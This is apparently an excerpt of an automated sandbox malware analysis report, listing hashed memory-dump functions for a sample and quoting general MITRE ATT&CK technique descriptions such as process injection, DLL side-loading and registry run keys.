Source File: 00000003.00000002.4144277720.0000000029240000.00000040.00000800.00020000.00000000.sdmp, Offset: 29240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29240000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 548912d06e1d8e293b3bf724247f8482cec4afe1e53dd2affc6d012b2031b066
Instruction ID: 94d8dfed772e48c1e2a197ba8fe245a8237a3745425f779120e3c528146d291e
Opcode Fuzzy Hash: 548912d06e1d8e293b3bf724247f8482cec4afe1e53dd2affc6d012b2031b066
Instruction Fuzzy Hash: 70C1B274E00218CFDB58DFA5C994B9DBBB2BF89304F2090A9D809AB355DB359E85CF50

Function 2924E0F0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144277720.0000000029240000.00000040.00000800.00020000.00000000.sdmp, Offset: 29240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29240000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9916c02f8df9cebe76ec7e8c49650e53639f5c337eca5e3def5617017a9d75f
Instruction ID: e881380532b5b040a16350cbbf6a9a29a4cba70c806a02628fe6aee0435b759a
Opcode Fuzzy Hash: e9916c02f8df9cebe76ec7e8c49650e53639f5c337eca5e3def5617017a9d75f
Instruction Fuzzy Hash: 98C1A274E00218CFDB18DFA5C994B9DBBB2BF89304F2090A9D809AB355DB359E85CF51

Function 2924CB38 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144277720.0000000029240000.00000040.00000800.00020000.00000000.sdmp, Offset: 29240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29240000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 687337733b0c3eb00012709a8eb07476fa3dda0cc560682981d07a8e06f145cf
Instruction ID: 8ed70f0449543ea590cb801b5991f54a554c61ba280f661a22d77de396fdc9fa
Opcode Fuzzy Hash: 687337733b0c3eb00012709a8eb07476fa3dda0cc560682981d07a8e06f145cf
Instruction Fuzzy Hash: 2AC1A474E00218CFDB18DFA5C994B9DBBB2BF89304F2090A9D809AB355DB355E85CF50

Function 2924FB00 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144277720.0000000029240000.00000040.00000800.00020000.00000000.sdmp, Offset: 29240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29240000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b44115bbc53d60b44f279ab19dd1b321cc1ac46402d5340fbe1863bca0a2338
Instruction ID: b14921e76a44ea39397cfdb401c57add495b2594245247a38d5cfcd51305805f
Opcode Fuzzy Hash: 7b44115bbc53d60b44f279ab19dd1b321cc1ac46402d5340fbe1863bca0a2338
Instruction Fuzzy Hash: 1FC1A374E00218CFDB18DFA5C994B9DBBB2BF89304F2090A9D809AB355DB359E85CF51

Function 2924CF90 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144277720.0000000029240000.00000040.00000800.00020000.00000000.sdmp, Offset: 29240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29240000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dcc702c4af88765fa56492056d4ba7b2837dadd4e23b114f22771e179c14602
Instruction ID: 6478a9c8fc5ebb62d1a5f4d1cbf26e4680bc92925edffcf38cee3436b2bd8675
Opcode Fuzzy Hash: 4dcc702c4af88765fa56492056d4ba7b2837dadd4e23b114f22771e179c14602
Instruction Fuzzy Hash: 70C19274E00218CFDB18DFA5C994B9DBBB2BF89304F2090A9D809AB355DB356E85CF50

Function 2924D3E8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144277720.0000000029240000.00000040.00000800.00020000.00000000.sdmp, Offset: 29240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29240000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 661e94628da30e0e5aa89ba643ebe5bd070eb496b2a50c67914e590e553cf986
Instruction ID: a8c5d47c959c62684181cdb37bd6a0a645bf7e98619b3f68af1ebf81032f7d0d
Opcode Fuzzy Hash: 661e94628da30e0e5aa89ba643ebe5bd070eb496b2a50c67914e590e553cf986
Instruction Fuzzy Hash: 32C19274E00218CFDB58DFA5C994B9DBBB2BF89304F2090A9D809AB355DB356E85CF50

Function 2924BE30 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144277720.0000000029240000.00000040.00000800.00020000.00000000.sdmp, Offset: 29240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29240000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b663e00b3218abc6138d08991e1300c6c0659168b0c158746e0430c1938b5cc
Instruction ID: f60374563d14b9f14409fc7a89d8a462f023884894351ebe6d145fd788ba0adc
Opcode Fuzzy Hash: 4b663e00b3218abc6138d08991e1300c6c0659168b0c158746e0430c1938b5cc
Instruction Fuzzy Hash: 8EC1B374E01218CFDB18DFA5C994B9DBBB2BF89304F2090A9D809AB355DB359E85CF50

Function 2924F250 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144277720.0000000029240000.00000040.00000800.00020000.00000000.sdmp, Offset: 29240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29240000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ac82ed683c28d07ccaf7a5d00aba40b74e204c3dbb9cb52bdefa6dce0db92d9
Instruction ID: a26cc0bdeeeaf629d41eb62a79459fa5099d3022cb98ca98bc505e2263594f5e
Opcode Fuzzy Hash: 3ac82ed683c28d07ccaf7a5d00aba40b74e204c3dbb9cb52bdefa6dce0db92d9
Instruction Fuzzy Hash: C7C1B374E01218CFDB18DFA5C994B9DBBB2BF89304F2090A9D809AB355DB359E85CF50

Function 2924F6A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144277720.0000000029240000.00000040.00000800.00020000.00000000.sdmp, Offset: 29240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29240000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9a0d289f82a99460d1007b1c945639385bdf8b152924fb5e7db7c1cff85d34d
Instruction ID: 8c2829878fcf034d5d4cfa47dc3f1336c88e6503a1a802d5425931eccac60315
Opcode Fuzzy Hash: e9a0d289f82a99460d1007b1c945639385bdf8b152924fb5e7db7c1cff85d34d
Instruction Fuzzy Hash: 39C1B274E00218CFDB18DFA5C994B9DBBB2BF89304F2090A9D809AB355DB359E85CF51

Function 2924C288 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144277720.0000000029240000.00000040.00000800.00020000.00000000.sdmp, Offset: 29240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29240000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a8cca0e052d6c13e19b95bd2a0ae26a3f7ff63c0e46344364419cc62687cbe8
Instruction ID: 1e04a4890919fccee1e07fc565dbaefe3db8ca3952abed270cc24dcf1f0c4d9b
Opcode Fuzzy Hash: 1a8cca0e052d6c13e19b95bd2a0ae26a3f7ff63c0e46344364419cc62687cbe8
Instruction Fuzzy Hash: 78C1B374E00218CFDB18DFA5C994B9DBBB2BF89304F2090A9D809AB355DB359E85CF50

Function 2924C6E0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144277720.0000000029240000.00000040.00000800.00020000.00000000.sdmp, Offset: 29240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29240000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85d6a47d6a2014af2c64cd7d56285c0a4854d70bd30986521e94dffdbb67c269
Instruction ID: 87cfe2622466677bff147f6b6c4f0b9fd290572e6e2ae8f2facbcf8e44bb602b
Opcode Fuzzy Hash: 85d6a47d6a2014af2c64cd7d56285c0a4854d70bd30986521e94dffdbb67c269
Instruction Fuzzy Hash: E6C19474E00218CFDB58DFA5C994B9DBBB2BF89304F2090A9D809AB355DB355E85CF50

Function 29255D10 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 586ea21fc6de6d373a98612d2a1ee9bdba512014070ee4273ab7c9a869566653
Instruction ID: 47d20d024d59fb96f8b3a11eb9365f872e05368bf350254e06ddc80a4fe8bc1d
Opcode Fuzzy Hash: 586ea21fc6de6d373a98612d2a1ee9bdba512014070ee4273ab7c9a869566653
Instruction Fuzzy Hash: F6C1B174E00218CFDB18DFA5C994B9DBBB2BF89304F2090A9D809AB355DB359E85CF50

Function 29253918 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9e71bb44ca30242f7f3182643fa656be0efa64d4ed57cfd11ba5eb7c4f159ae
Instruction ID: ef3f8801f7d4a741cfc3eb0747a773ab814d52a1785f998f07357dd300fd1ccb
Opcode Fuzzy Hash: a9e71bb44ca30242f7f3182643fa656be0efa64d4ed57cfd11ba5eb7c4f159ae
Instruction Fuzzy Hash: A1C1B274E01218CFDB18DFA5C994B9DBBB2BF89304F2090A9D809AB355DB359E85CF50

Function 29256168 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cdf1a540875a90e17504da7b32c57d8c5ea3fe81cab6c471445005204cb4fdf
Instruction ID: 61185e79a341fcfd0af8dc967a13e61c37413a7a3b67589df5dac053ef3f1625
Opcode Fuzzy Hash: 1cdf1a540875a90e17504da7b32c57d8c5ea3fe81cab6c471445005204cb4fdf
Instruction Fuzzy Hash: D3C1B374E00218CFDB58DFA5C994B9DBBB2BF89304F2090A9D809AB355DB359E85CF50

Function 29253D70 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46aa99f29d0b824fd780670633c5997501f4c8958734b107aed63ea104e55daf
Instruction ID: 307c49a179c35822aa602f1a192b156376c84b6b363c739598265d02e0ec520b
Opcode Fuzzy Hash: 46aa99f29d0b824fd780670633c5997501f4c8958734b107aed63ea104e55daf
Instruction Fuzzy Hash: 83C1A174E00218CFDB18DFA5C994B9DBBB2BF89304F2090A9D809AB355DB359E85CF50

Function 29250D48 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa299083a1e4e32785b64951631820c0e2a388df71038cdeea98c5764f3fa726
Instruction ID: 9002ccba6ec98ee8cf63f26b239a2807c7a5d309970c1ba9882eed9a5a7999d0
Opcode Fuzzy Hash: aa299083a1e4e32785b64951631820c0e2a388df71038cdeea98c5764f3fa726
Instruction Fuzzy Hash: 33C1A274E00218CFDB58DFA5C994B9DBBB2BF89304F2090A9D809AB355DB359E85CF50

Function 292511A0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bf8cc8a4560b9b420c4d701a1464992c7cb663c1f9d9789d403b5d8a0edd980
Instruction ID: 7f65edf1228248f3b34ad398273171422e63824a526adf44443ffb2f3352bc46
Opcode Fuzzy Hash: 6bf8cc8a4560b9b420c4d701a1464992c7cb663c1f9d9789d403b5d8a0edd980
Instruction Fuzzy Hash: DBC1A374E00218CFDB18DFA5C994B9DBBB2BF89304F2090A9D809AB355DB359E85CF51

Function 292515F8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 286af370d9ac21f85c36dd6ff3446fa6d72c5f193b632edcd3c4a0d8f891f543
Instruction ID: 05e30b3e03ea5f2143972946ff93935c5b281b387304523e06080a2b6a362dd6
Opcode Fuzzy Hash: 286af370d9ac21f85c36dd6ff3446fa6d72c5f193b632edcd3c4a0d8f891f543
Instruction Fuzzy Hash: 84C1B374E00218CFDB18DFA5C994B9DBBB2BF89304F2091A9D809AB355DB359E85CF50

Function 292541C8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c04b4f05ec7725d1aff641707a01be073b2a1b083dcda3f34d1be314cf853780
Instruction ID: b327fc81cb3eafaec72360f4c92c78d884c848f44e100b90dff1168b732067ae
Opcode Fuzzy Hash: c04b4f05ec7725d1aff641707a01be073b2a1b083dcda3f34d1be314cf853780
Instruction Fuzzy Hash: ADC19174E00218CFDB58DFA5C994B9DBBB2BF89304F2090A9D809AB355DB359E85CF50

Function 29254620 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 334c8ceeb8f718dbabd195558a297d8d8f1b7fc2f6e80b121cc41bf59c658b98
Instruction ID: 47ef62b0c65cd778b1731008907603bfc74a7bbb6210722680dc9dc793b826fa
Opcode Fuzzy Hash: 334c8ceeb8f718dbabd195558a297d8d8f1b7fc2f6e80b121cc41bf59c658b98
Instruction Fuzzy Hash: 5DC19F74E00218CFDB58DFA5C994B9DBBB2BF89304F2090A9D809BB355DB359A85CF50

Function 29255460 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2ac63d541c8845383c013e8b25b92851f6bf0f45894885de9813e180afb0dd6
Instruction ID: 2a280c0b93b8e87179b7ae9da590ef09c32a2cc0b7396f7617e6002074b6713d
Opcode Fuzzy Hash: d2ac63d541c8845383c013e8b25b92851f6bf0f45894885de9813e180afb0dd6
Instruction Fuzzy Hash: 75C1A274E01218CFDB18DFA5C994B9DBBB2BF89304F2090A9D809AB355DB359E85CF50

Function 29253068 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f17e20e6f8c876590bd2d7922925b9505d39db5067a207e0fd18e4665cb0bad
Instruction ID: 085b412ea8d0e4e85300cff393a99a70ac62256131d2b37f0a2c7d0b11f638ea
Opcode Fuzzy Hash: 6f17e20e6f8c876590bd2d7922925b9505d39db5067a207e0fd18e4665cb0bad
Instruction Fuzzy Hash: 44C1B274E00218CFDB18DFA5C994B9DBBB2BF89304F2090A9D809AB355DB359E85CF50

Function 29254A78 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b7f4369c6131352d275bf8ef1bdd96f34b8cee77cc73ff2502c186ae8020ad6
Instruction ID: 04ba9933dddd60f6459a177f5c5b2c7ca6d4799c74a495911971d1dbda226f1d
Opcode Fuzzy Hash: 3b7f4369c6131352d275bf8ef1bdd96f34b8cee77cc73ff2502c186ae8020ad6
Instruction Fuzzy Hash: E2C19074E00218CFDB58DFA5C994B9DBBB2BF89304F2090A9D809AB355DB359E85CF50

Function 2792EC1B Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72108ad2e15a02fcd3774083ee6814230110af841119b049a61fab290ee51693
Instruction ID: f62aebaa4f3a7f8dc6f397a24fa4da144ca7d8fff082eadf49a0adabb093c4ce
Opcode Fuzzy Hash: 72108ad2e15a02fcd3774083ee6814230110af841119b049a61fab290ee51693
Instruction Fuzzy Hash: 79A1B974A01328CFDB65DF24C994B9ABBB2BF4A304F1085EAD40DA7254DB359E81CF51

Function 2792E114 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 312da9771df06fef9f7e684ad8ef094457729b639416cd820d842828e4b41214
Instruction ID: 51cb761661f70522a52ab5258b2d8bef5fb5a8431a354338e6c10e4b85c0718a
Opcode Fuzzy Hash: 312da9771df06fef9f7e684ad8ef094457729b639416cd820d842828e4b41214
Instruction Fuzzy Hash: FE516970E45608CFDB00EFA8C888BEDBBB6BF49308F209169D504AB289D7759981CF50

Function 2792DF33 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c14b5ce8ab8bb2bb89e8656fbccbeee1cd117ec8f499cc160309b20c03701ef
Instruction ID: b0bc5e74caf3aeab078e8bfac271b0b651f34a7f00664bdfeb8fdf8a27b58203
Opcode Fuzzy Hash: 7c14b5ce8ab8bb2bb89e8656fbccbeee1cd117ec8f499cc160309b20c03701ef
Instruction Fuzzy Hash: 1C517770D01608CBDB04EFA9C9887EDBBB6BF49308F20D029D500BB288DB759985CB54

Function 2792EDFB Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 407f4ce711020301e10dc60c6af81e1e4ea659e4385dbcc893d947d53d7dd589
Instruction ID: 9a965bee7f3d1c12f7add9a8aa57419071c573a0c210226bf4c662bea34a7b8b
Opcode Fuzzy Hash: 407f4ce711020301e10dc60c6af81e1e4ea659e4385dbcc893d947d53d7dd589
Instruction Fuzzy Hash: 7D51AD74A01328CFCB65DF24C994B9AB7B2BF4A305F6085E9D409A7254CB759E81CF50

Function 2500DC80 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4134870299.0000000025000000.00000040.00000800.00020000.00000000.sdmp, Offset: 25000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_25000000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f306d265dd24c59976d3670e03dcd616d2f335494e983aa47c0893bea8703d6
Instruction ID: 4d0e1442d61aa4a17d000218ba2d7fea5eceddb874599af9290d7994700d7ea0
Opcode Fuzzy Hash: 9f306d265dd24c59976d3670e03dcd616d2f335494e983aa47c0893bea8703d6
Instruction Fuzzy Hash: A041FFB5D007489FEB04CFA9D884A9EFBF1BB09300F20902AE415BB250D775A986CF55

Function 29259B8A Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82ae6f97c0794009ee6d9406468b162a0606f3aa3c3f0db7dd27e14f22816e5d
Instruction ID: 248d93ed651c969e69d8ccf0636a238c2efb3563c4dde8bb07ee9867233c4fc8
Opcode Fuzzy Hash: 82ae6f97c0794009ee6d9406468b162a0606f3aa3c3f0db7dd27e14f22816e5d
Instruction Fuzzy Hash: 8F41FEB4D022198FCB08CFA8C594BAEBBF1AF49308F1454A9D415BB390D7389A41CF95

Function 29256F69 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b5a0f76eff8eb99f3ec8ec3907959e103c92edf64f075bb58e2989bfe393dd
Instruction ID: 2d0788865d35d49b5ba04d8f3da5e80efc3c0fb6d9b8a69d7813dd281fbdfd1a
Opcode Fuzzy Hash: 67b5a0f76eff8eb99f3ec8ec3907959e103c92edf64f075bb58e2989bfe393dd
Instruction Fuzzy Hash: A221AAB5D01218DFCB14CF99D980ADEFBF4EB49320F14905AE818B7210D375A945CFA5

Function 29256F70 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 788874be88d5058988e4375ec5ac67359f739d7d027489236d0b57bea5798d0a
Instruction ID: eb704e9ecb31465b8e7195d8722d0545f4e1aa95b9dd4674da84d09e61408057
Opcode Fuzzy Hash: 788874be88d5058988e4375ec5ac67359f739d7d027489236d0b57bea5798d0a
Instruction Fuzzy Hash: 8321B9B5D012188FCB14CF99D980ADEFBF4EB49320F24902AE818B7310C335A941CFA4

Function 279257A0 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 279257B6
\;^q, xrefs: 279257AC
\;^q, xrefs: 279257DE
\;^q, xrefs: 279257D2

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: c86f6d1f81791611fc492e35b81a2e9e9c5dfafe877fde34985daaa1d3cd90b3
Instruction ID: ac04f70c29b33b45eb4fb094a0d327df68d2432803fbf3bce7bdb261cff8fa70
Opcode Fuzzy Hash: c86f6d1f81791611fc492e35b81a2e9e9c5dfafe877fde34985daaa1d3cd90b3
Instruction Fuzzy Hash: B701B131B90B24CFC704BE2DC46490537EEAF88B6972184EAE541CB3B8DE71DD419740

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
